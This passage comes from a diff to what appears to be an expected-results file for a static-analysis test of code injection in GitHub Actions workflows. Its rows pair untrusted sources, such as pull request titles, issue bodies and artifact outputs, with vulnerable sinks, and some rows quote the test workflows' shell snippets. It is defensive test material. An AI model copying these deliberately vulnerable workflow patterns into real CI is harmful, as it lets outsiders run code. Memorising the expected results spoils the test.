steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | 